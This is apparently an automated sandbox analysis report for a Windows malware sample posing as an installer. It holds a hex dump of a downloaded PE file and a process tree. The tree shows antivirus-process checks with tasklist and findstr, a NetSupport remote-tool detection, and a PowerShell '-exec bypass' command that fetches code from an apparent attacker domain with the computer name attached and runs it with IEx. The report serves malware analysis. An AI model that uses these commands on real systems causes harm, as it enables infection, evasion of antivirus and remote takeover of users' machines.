                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6ffadcac346-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2869&recv_bytes=820&delivery_rate=1771844&cwnd=181&unsent_bytes=0&cid=d58ff94b1a028ae4&ts=631&x=0"
                                                                                                                                                                              2024-12-26 17:26:42 UTC464INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b
                                                                                                                                                                              Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00
                                                                                                                                                                              Data Ascii: @HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09
                                                                                                                                                                              Data Ascii: @Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00
                                                                                                                                                                              Data Ascii: @[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69
                                                                                                                                                                              Data Ascii: f@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMoni
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc
                                                                                                                                                                              Data Ascii: erConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74
                                                                                                                                                                              Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUSt
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00
                                                                                                                                                                              Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
                                                                                                                                                                              2024-12-26 17:26:42 UTC1369INData Raw: 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00
                                                                                                                                                                              Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:12:25:07
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                              Imagebase:0x7ff7f00b0000
                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:12:25:30
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868
                                                                                                                                                                              Imagebase:0xee0000
                                                                                                                                                                              File size:700'416 bytes
                                                                                                                                                                              MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:12:25:40
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'084'064 bytes
                                                                                                                                                                              MD5 hash:911D5567537C6BB8413884309387BB54
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:12:25:40
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd
                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:12:25:40
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:12:25:42
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:12:25:42
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                              Imagebase:0x710000
                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:12:25:42
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:12:25:42
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                              Imagebase:0x710000
                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:12:25:43
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:cmd /c md 709182
                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:12:25:43
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:extrac32 /Y /E Bet
                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                              File size:29'184 bytes
                                                                                                                                                                              MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:12:25:43
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:findstr /V "brandon" M
                                                                                                                                                                              Imagebase:0x710000
                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:12:25:44
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N
                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:12:25:44
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:Lightweight.com N
                                                                                                                                                                              Imagebase:0xa10000
                                                                                                                                                                              File size:947'288 bytes
                                                                                                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:12:25:44
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                              Imagebase:0xf80000
                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:12:25:48
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\notepad.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt
                                                                                                                                                                              Imagebase:0x7ff7cda80000
                                                                                                                                                                              File size:201'216 bytes
                                                                                                                                                                              MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:12:26:38
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                                              Imagebase:0x860000
                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:12:26:38
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:12:26:56
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:powershell -exec bypass MZP
                                                                                                                                                                              Imagebase:0x860000
                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:12:26:56
                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                Total number of Nodes:725
                                                                                                                                                                                Total number of Limit Nodes:44
